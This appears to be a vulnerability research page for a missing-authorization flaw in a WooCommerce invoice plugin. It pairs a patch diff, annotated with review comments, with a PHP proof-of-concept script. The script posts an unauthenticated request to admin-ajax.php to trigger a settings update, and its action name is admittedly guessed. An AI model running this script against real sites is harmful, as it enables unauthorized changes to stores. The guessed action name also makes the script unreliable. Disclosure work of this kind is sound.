 					</style>
 					<div class="colophon-policies">
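Review bot: the ternaries check `! empty()` on the raw value and only then sanitize it, so a stored value that is non-empty but invalid bypasses the default: `sanitize_hex_color()` returns null for a non-hex string and `absint()` returns 0 for a non-numeric one, yielding `color: ;` or `font-size: 0px`. Reorder to sanitize first and fall back on the sanitized result, e.g. `absint( ... ) ?: 14`.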
@@ -331,7 +345,7 @@
 				if ( isset( $data['footer']['active'] ) ) {
 					$style = 'font-size:' . $data['footer']['footer_font_size'] . 'px;color:' . $data['footer']['footer_text_colour'] . ';';
 					?>
-					<div class="colophon-imprint" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="colophon-imprint" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_imprint(); ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/print-order/print-header.php
+++ b/woocommerce-delivery-notes/templates/print-order/print-header.php
@@ -37,6 +37,15 @@
 			th {
 				text-align:right;
 			}
+			.company-address p {
+				direction: ltr !important;
+			}
+			.billing-address address {
+				direction: ltr !important;
+			}
+			.shipping-address address {
+				direction: ltr !important;
+			}
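Review bot: forcing `direction: ltr !important` on the company, billing and shipping address blocks will render right-to-left locales incorrectly for stores that print in Arabic, Hebrew or similar languages; if the aim is to fix a mixed-direction layout problem, `unicode-bidi: isolate` on the container, or scoping the rule so it does not apply when the document is `dir="rtl"`, is a less blunt fix.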
 		</style>
 		<?php
 	}
--- a/woocommerce-delivery-notes/woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/woocommerce-delivery-notes.php
@@ -5,15 +5,15 @@
  * Plugin Name: Print Invoice & Delivery Notes for WooCommerce
  * Plugin URI: https://www.tychesoftwares.com/
  * Description: Print Invoices & Delivery Notes for WooCommerce Orders.
- * Version: 5.8.0
+ * Version: 5.9.0
  * Author: Tyche Softwares
  * Author URI: https://www.tychesoftwares.com/
  * License: GPLv3 or later
  * License URI: http://www.opensource.org/licenses/gpl-license.php
  * Text Domain: woocommerce-delivery-notes
  * Domain Path: /languages
- * WC tested up to: 10.2.1
- * Tested up to: 6.8.2
+ * WC tested up to: 10.4.3
+ * Tested up to: 6.9.0
  * WC requires at least: 5.0.0
  * Requires PHP: 7.4
  * Requires Plugins: woocommerce

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24946 - Print Invoice & Delivery Notes for WooCommerce <= 5.8.0 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2026-24946
 * This script demonstrates the missing authorization vulnerability in the
 * Print Invoice & Delivery Notes for WooCommerce plugin (<= 5.8.0).
 * The vulnerability allows unauthenticated attackers to trigger the plugin's
 * update function which modifies WordPress settings.
 *
 * DISCLAIMER: For authorized security testing only. Do not use against systems
 * you do not own or have explicit permission to test.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// The specific action name depends on how the plugin registers its AJAX handlers
// Based on the code diff, the plugin likely uses 'wcdn_update_settings' or similar
$action = 'wcdn_update_settings';

// Prepare the POST data to trigger the vulnerable update function
$post_data = [
    'action' => $action,
    // The vulnerable function doesn't check for nonce or capabilities
    // so no additional parameters are needed
];

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate browser request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept: application/json, text/javascript, */*; q=0.01',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With: XMLHttpRequest'
]);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "\n";
} else {
    echo "HTTP Status Code: $http_code\n";
    echo "Response: $response\n";

    // Analyze response
    if ($http_code == 200 && strpos($response, 'success') !== false) {
        echo "[+] Vulnerability likely exploited successfully\n";
        echo "[+] Plugin update function executed without authorization\n";
    } else {
        echo "[-] Exploitation may have failed\n";
        echo "[-] The plugin may be patched or action name is incorrect\n";
    }
}

// Clean up
curl_close($ch);

// Note: The exact action name may vary based on plugin implementation
// Security researchers should examine the plugin's AJAX registration
// to determine the correct action parameter value.
?>
